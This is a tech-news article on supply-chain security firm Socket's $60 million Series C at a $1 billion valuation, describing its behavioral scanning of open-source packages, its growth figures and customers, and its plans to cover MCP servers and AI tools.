Socket closed a $60 million Series C at a $1 billion valuation on May 20, led by Thrive Capital — pushing total funding to roughly $125 million and minting a new supply-chain-security unicorn at the moment AI-generated code is flooding production pipelines.
The round
Thrive Capital led, with existing backers Andreessen Horowitz and Abstract Ventures returning and Capital One Ventures joining as a new investor; angel checks included Anthropic's Nick Marwell. Founder Feross Aboukhadijeh's company says it now protects more than 27,000 organizations, up from 7,500 at its Series B — roughly 3.6x growth — across a 100-plus-person team.
What Socket does, and why now
Socket analyzes the behavior of open-source dependencies in real time rather than checking them against known-vulnerability databases. It sandboxes packages and flags malicious signals — install scripts, unexpected network calls, obfuscation, credential or filesystem access — before third-party code reaches production. That behavioral approach is built to catch the attacks signature scanners miss: typosquats, hijacked maintainer accounts, and post-publish package tampering that have driven a string of recent npm and PyPI compromises.
The scale numbers frame the bet: Socket says it secures 1.5 million repositories, screens over 11.6 million commits a month, and blocks more than 10,000 supply chain attacks every week.
The AI angle
Socket's pitch leans directly on agentic development. The company cites that AI now writes more than 90% of code at top engineering organizations — meaning dependencies get pulled in faster than humans can review them, and the window for a malicious package to slip through narrows to nothing. Its customer list reads like an AI-lab roster: Anthropic, xAI, Replit, Cursor, Vercel, and Figma all appear alongside Gusto, Mercado Libre, Cribl, and unnamed Fortune 100 financial-services and media firms.
What the capital changes
The company laid out five priorities. It will expand Socket Firewall to more package ecosystems and scale "Certified Patches" — surgical CVE fixes intended to remediate without breaking production. Most relevant to builders, it plans to extend protection to browser extensions, code-editor extensions, MCP servers, and AI tools — exactly the surfaces that have drawn fresh scrutiny as Model Context Protocol servers proliferate and agents gain the ability to install and execute third-party code autonomously.
What it means for builders
For teams shipping AI-generated code at volume, the implication is that periodic dependency scanning no longer matches the threat model. When agents auto-import packages and human review shrinks, supply-chain defense moves inline — enforced at the firewall, on every commit, against runtime behavior rather than a CVE list. A $1 billion valuation signals investors expect that shift to become a default line item in the AI-native engineering stack, not a niche security add-on.
